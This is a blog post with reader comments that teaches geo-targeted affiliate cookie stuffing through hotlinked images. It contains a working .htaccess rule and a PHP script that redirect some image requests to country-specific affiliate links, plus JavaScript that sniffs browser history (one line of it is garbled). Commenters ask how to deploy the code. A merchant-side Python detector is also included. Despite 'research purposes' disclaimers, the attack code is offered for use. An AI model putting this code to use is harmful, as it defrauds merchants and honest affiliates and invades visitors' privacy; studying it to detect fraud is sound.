
Geo-Targeted Image Based Cookie Stuffing

People are lazy so I write this first
This (research) based post will demonstrate the techniques behind stuffing affiliate cookies via images, on any website you can post images (think forums), how to get other people to do this for you and how to geographically target cookie stuffing.

Zonk. Back in 2007 I did a post about making money with affiliates by cookie stuffing. While nobody admits to cookie stuffing, it turns out you’re all lying shits as that post gets more search traffic than anything else.

Personally, I think cookie stuffing is low, I wouldn’t recommend it or condone it. It’s probably illegal (eBay certainly think so) and you’ll probably go to hell in the afterlife.

Oh, you’ll probably get caught too if you used lame iframe techniques, so for research purposes only I want to explain how to turn cookie stuffing up a notch, if you were silly enough to do such a thing.

iFrames are so 1990s
I’d be quite happy never to see an iframe again, even though I’m sure there’s going to be a rebirth as SEOmoz said it was a possible route to sculpt pagerank after the no-follow actually doesn’t sculpt anything admission from Mr. Cutts.

Yea, so don’t use them.

Serving cookies through images
You can actually serve cookies through images (sort of). It’s a lot more sneaky and it means you can essentially serve a cookie to anywhere you can post HTML.

I’ve seen people propagate this by encouraging people to hotlink as well. So for instance, auto-generating a celebrity photo gallery and offering embed codes. Visitors merrily go about posting images all over the web while they are secretly serving cookies.

So there’s a mechanism to automatically propagate cookies all over the interwebs.

Geo-targeting cookie stuffing
Conversion rate is one (of a few) indicators that are watched to try and rumble cookie stuffers. You need to do everything you can to make sure your conversion rate is as high as possible. So, let’s start with geo-targeting. It’s no good serving cookies to Americans for eBay UK or serving ebay.com cookies for Italians. You get the idea. So detecting what country your visitor is from and serving the correct cookie increases your chance of a cookie stuff vs conversion.

Cookie stuffing images with .htaccess
Okay, we’re going to have to intercept image requests and redirect them to a script to decide if and which cookie to stuff.

The below .htaccess file will grab requests that do not originate from your site or search bots and pass them to a serveimage php file.

Options +FollowSymLinks 

RewriteEngine on 

# Let's not cookie stuff our own visitors!

RewriteCond %{HTTP_REFERER} !^$ [NC]

# If the request is outside of your site

RewriteCond %{HTTP_REFERER} !^http://([^.]+\.)?mywebsite\.com/ [NC]

# If the request is not from a few bots (pretty basic, add to this!)

RewriteCond %{HTTP_USER_AGENT} !(googlebot-image|msnbot|psbot|yahoo-mmcrawler) [NC]

# Grab the image name, extension type, go to our serveimage.php file

RewriteRule ^images/([a-zA-Z0-9]+).(bmp|gif|jpe?g|png)$ /serveimage.php?img=$1&ext=$2 [L]

Cookie stuffing images with PHP
So now we’re passing image requests to serveimage.php, you need to have the following in place:

<?php


//Get the image name from request
$ext = $_GET['ext'];
$path = "images/".$_GET['img'].".".$_GET['ext'];

	
// Decide if we should stuff our lucky visitor with a cookie

//Let's generate a random number
$rand = mt_rand(0, 1000); 

// See if it is a lucky request
// You can change percentage by changing $rand<??; 5=0.5%, 10=1%, 100=10% etc
// 10% chance to serve cookie instead of image

if ($rand<100) { cookie_stuff(); } else {spit_it_out($ext,$path);}


//Functions

// Forget it - serve them an image!

function spit_it_out($ext, $path) {
header("Cache-Control: no-cache");
header("Pragma: no-cache");
if ($ext=='jpeg'|$ext=='jpg') {
header("Content-type: image/jpeg");
} else if ($ext=='gif') {
header("Content-type: image/gif");
} else if ($ext=='bmp') {
header("Content-type: image/bmp");
} else {
header("Content-type: image/png");
}
readfile('http://'.$_SERVER["SERVER_NAME"].'/'.$path) or die("error!");
exit;
}



// We have a winner! Stuff a cookie
		
function cookie_stuff() {
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($ip)) {

// Work out what country they are in
$country = file_get_contents("http://api.hostip.info/country.php?ip=$ip"); } else {$country="US";}
if ($country=="UK") {
header('Location: http://YOUR-UKAFFILIATE-LINK'); //UK
}
elseif ($country=="CA") {
header('Location: http://YOUR-CANADA-AFFILIATE-LINK'); //CANADA
}
else {
header('Location: YOUR-USA-AFFILIATE-LINK'); //US

// Add as many countries as you want: http://www.worldatlas.com/aatlas/ctycodes.htm

}
}

?>

So this PHP code will take your hotlinker, and 10% of the time stuff an affiliate cookie for the correct country and 90% of the time correctly serve the image.

You can add as many country codes as you like, you can get a list from WorldAtlas.

I’ve personally seen people make over 1,000 per day when they get creative with cookies, obviously the deeper you stick your hand in the cookie jar, the more likely you are to get caught.

Other security measures and improvements
As the more astute among you have no doubt realised, big boy sites have more layers for detecting cookie stuffing, such as:

1) What page do people land on (always the same page being hit?)

2) How long do they stay on the site on average

3) How many / which pages do they view

4) Some sites double serve a verification file, such as a tiny gif and cross-check you have the image and the cookie

Some of the basic stuff like user agent / IP are covered in this script, but on any scale you’d need to tackle the above issues. Yes, it’s totally possible – just remember, if a human can do it in a browser, you can write a script to do it as well.
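Seen from the merchant's side, checks 2 to 4 above can be run over the request log, one session per tracking cookie. The following is an added example, not code from the original post: the click endpoint, verification file name, log field names and thresholds are assumptions, and the Accept-header test is a heuristic that not every browser satisfies.

```python
from collections import defaultdict

CLICK_PATH = "/aff/click"           # assumed affiliate click endpoint
VERIFY_PATH = "/static/verify.gif"  # assumed verification file on landing pages
MIN_DWELL = 5                       # seconds on site; assumed threshold

# Constructed sample requests (not real traffic); field names are assumptions.
EVENTS = [
    {"sid": "a1", "aff": "7", "t": 0, "path": CLICK_PATH, "accept": "text/html,*/*"},
    {"sid": "a1", "aff": "7", "t": 1, "path": VERIFY_PATH, "accept": "image/webp,*/*"},
    {"sid": "a1", "aff": "7", "t": 45, "path": "/product/42", "accept": "text/html"},
    {"sid": "b2", "aff": "9", "t": 0, "path": CLICK_PATH, "accept": "image/webp,image/*"},
    {"sid": "c3", "aff": "9", "t": 0, "path": CLICK_PATH, "accept": "*/*"},
]

def session_signals(requests):
    """Return the stuffing indicators for one session's requests."""
    reqs = sorted(requests, key=lambda r: r["t"])
    idx = next((i for i, r in enumerate(reqs) if r["path"] == CLICK_PATH), None)
    if idx is None:
        return []
    click, later = reqs[idx], reqs[idx + 1:]
    signals = []
    # An <img> fetch usually lists an image type first in Accept (heuristic).
    if click["accept"].split(",")[0].strip().lower().startswith("image/"):
        signals.append("click_fetched_as_image")
    if not any(r["path"] == VERIFY_PATH for r in later):  # check 4: file never fetched
        signals.append("no_verification_file")
    if all(r["path"] == VERIFY_PATH for r in later):      # check 3: no pages viewed
        signals.append("no_page_views")
    if (later[-1]["t"] - click["t"] if later else 0) < MIN_DWELL:  # check 2: time on site
        signals.append("short_dwell")
    return signals

def flag_sessions(events, threshold=2):
    """Return {sid: signals} for sessions showing at least `threshold` signals."""
    by_sid = defaultdict(list)
    for e in events:
        by_sid[e["sid"]].append(e)
    scored = {sid: session_signals(reqs) for sid, reqs in by_sid.items()}
    return {sid: s for sid, s in scored.items() if len(s) >= threshold}

def affiliate_flag_rate(events, threshold=2):
    """Return the share of each affiliate's sessions that were flagged."""
    flagged = flag_sessions(events, threshold)
    sessions = defaultdict(set)
    for e in events:
        sessions[e["aff"]].add(e["sid"])
    return {a: sum(s in flagged for s in sids) / len(sids) for a, sids in sessions.items()}
```

An affiliate whose flag rate sits far above the programme average is the one to review by hand.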

Get creative – check the browser history

If you want to raise conversion rates even further, you can check that they’ve visited the site you want to cookie stuff for. If they’ve previously visited the site, it’s much more likely they’ve got an account and are likely to buy.

Here’s some JavaScript to check user history (I didn’t write this one):

var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
  "http://list.com/",
  "http://of.com/",
  "http://sites.com/",
  "http://you.com/",
  "http://want.com/",
  "http://to.com/",
  "http://check.com/",
  "http://users.com/",
  "http://history.com/",
  "http://for.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {

  var d = document.createElement('div');
  d.id = 'xss_flag';
  document.body.appendChild(d);

  var d = document.createElement('table');
  d.border = 0;
  d.cellpadding = 5;
  d.cellspacing = 10;
  d.width = '90%';
  d.align = 'center';
  d.id = 'data';
  document.body.appendChild(d);

  document.write('');
  for (var i = 0; i <>');

  /* launch steal history */

if (is_mozilla) {
  stealHistory();
}

}

function stealHistory() {

  // loop through websites and check which ones have been visited
  for (var i = 0; i < websites.length; i++) {          
         var link = document.createElement("a");       
         link.id = "id" + i;       
         link.href = websites[i];       
         link.innerHTML = websites[i];              
         document.body.appendChild(link);       
         var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");       
         document.body.removeChild(link);       
// check for visited       
     if (color == "rgb(0, 0, 255)") {           
         document.write('' + websites[i] + '');
      } // end visited check
  
  } // end visited website loop

} // end stealHistory method

I hope this post helps merchants and affiliate networks everywhere to tackle cookie stuffers. I’ll do a follow-up at some point explaining how to mimic user browsing behavior properly.

End thought: Web based e-mail clients can also load images. Chain mails still do well…..


17 responses to “Geo-Targeted Image Based Cookie Stuffing”

  • Scooter says:

    Hi,
    Sorry what is the meaning of line 35?
    >> for (var i = 0; i ‘);
    I don’t get it.

    Comment by Scooter
    July 17th, 2009 @ 9:05 pm

  • Scooter says:

    Second sorry on the last script.

    Comment by Scooter
    July 17th, 2009 @ 9:05 pm

  • Allan says:

    If you do not condone cookie stuffing then why are you providing the tools to do so.

    There have been some high profile people caught with their fingers in the cookie jar, no naming names.

    Sure Cookie stuffers will indeed go to hell, the bible is indeed specific when it says thou shalt not stuff thy neighbours cookie.

    The problem is that the people who get hurt here are the honest affiliate marketers, the merchants and networks will still get their share.

    If you want to help the merchants why not just email them what you know.

    Seriously how many newbs are going to cut/paste the code in the hope of making thousands.

    Comment by Allan
    July 18th, 2009 @ 2:16 pm

  • Mark says:

    Supermarkets sell knives, but do they condone stabbing?

    If the level of knowledge was equal, then there wouldn’t be any cookie stuffing.

    Frankly, I barely get time to blog, let alone compiling a list of every merchant and affiliate network and sending them the code. I’m not some kind of internet-missionary spending my days emailing people advice they didn’t ask for.

    You’re also not considering the tens of thousands of websites that build and run their own affiliate schemes in house, how would you suggest I let them know?

    If you’re that worried, why not share this page with some merchant friends.

    Any affiliate networks that don’t take basic protection against cookie stuffing, really are asking for trouble. Yes, it would be nice if everyone always played by the rules, unfortunately that’s not how the world works.

    I know there’s been high-profile cases – which is why I gave a link to one. The afterlife scares me more, though. 0_o

    Comment by Mark
    July 18th, 2009 @ 2:42 pm

  • Rob says:

    Nice PHP code there, Mark… 😉

    Comment by Rob
    July 20th, 2009 @ 11:17 am

  • mark says:

    I don’t know much about JavaScript, I have been looking at http://www.azarask.in/blog/post/socialhistoryjs/ trying to use a users history to redirect them to an affiliate, any help would be appreciated. I see your code above but what about implementation.

    Comment by mark
    August 12th, 2009 @ 4:04 pm

  • Solez says:

    Could you elaborate on:

    “Some sites double serve a verification file, such as a tiny gif and cross-check you have the image and the cookie”

    I am a little confused about how this is done.

    Thanks, and great post!

    Comment by Solez
    August 26th, 2009 @ 5:44 am

  • busin3ss says:

    Fuck, amazing blog post. Can’t believe I missed it when you posted it.

    Can I write about it @ my blog?

    Comment by busin3ss
    August 27th, 2009 @ 7:26 pm

  • Mark says:

    Does a blackhat need permission? (;

    Comment by Mark
    August 27th, 2009 @ 7:41 pm

  • webandrank says:

    The best and common ingredient is a delicious cookie but don’t cookie too much.

    Comment by webandrank
    September 5th, 2009 @ 10:39 am

  • Mark says:

    Spam fail (:

    Comment by Mark
    September 15th, 2009 @ 2:57 pm

  • Svonrik says:

    Hey, I’m not very good with php so I’d just like to know what details I should change for my own website,

    I know I have to change the affiliate Urls, then what about the image and extensions?

    I see you use $1 and $2 in the htaccess, should I define them?

    For the php script, should I change anything in lines 4 and 5?

    Thanks and hope you will reply, learning something new everyday so I want to test this script to see if it works!

    Comment by Svonrik
    November 17th, 2009 @ 6:27 pm

  • Michael says:

    The history check is indeed a nice method. Didn’t know it was possible to check the history of a visitor via JavaScript, there is a whole new world of possibilities when you consider this.

    Comment by Michael
    February 12th, 2010 @ 10:56 pm

  • Sarita Rawat says:

    Nice PHP code.

    Comment by Sarita Rawat
    May 12th, 2010 @ 9:10 am

  • Charles Brown says:

    Cookie stuffing isn’t illegal. There’s nothing written in federal law about cookie stuffing. Sure, it goes against every site’s TOS but there was a recent court case in which it was decided that website TOS doesn’t equal federal law…

    So you can’t go to jail for it, but you can be sued though 😉

    Comment by Charles Brown
    May 22nd, 2010 @ 2:07 am

  • Joe Arroyo says:

    I really liked your article. I just randomly happened to find this website while I was in the process of studying with Google search. Wanted to tell you I enjoyed your blog and to keep up on doin what you’re doin. Also don’t forget, enjoy the adventure.. don’t put too much emphasis on the final result. See ya, Joe Arroyo

    Comment by Joe Arroyo
    August 3rd, 2010 @ 4:26 pm

  • Sam says:

    Thanks for the PHP Code

    Comment by Sam
    January 25th, 2011 @ 10:38 am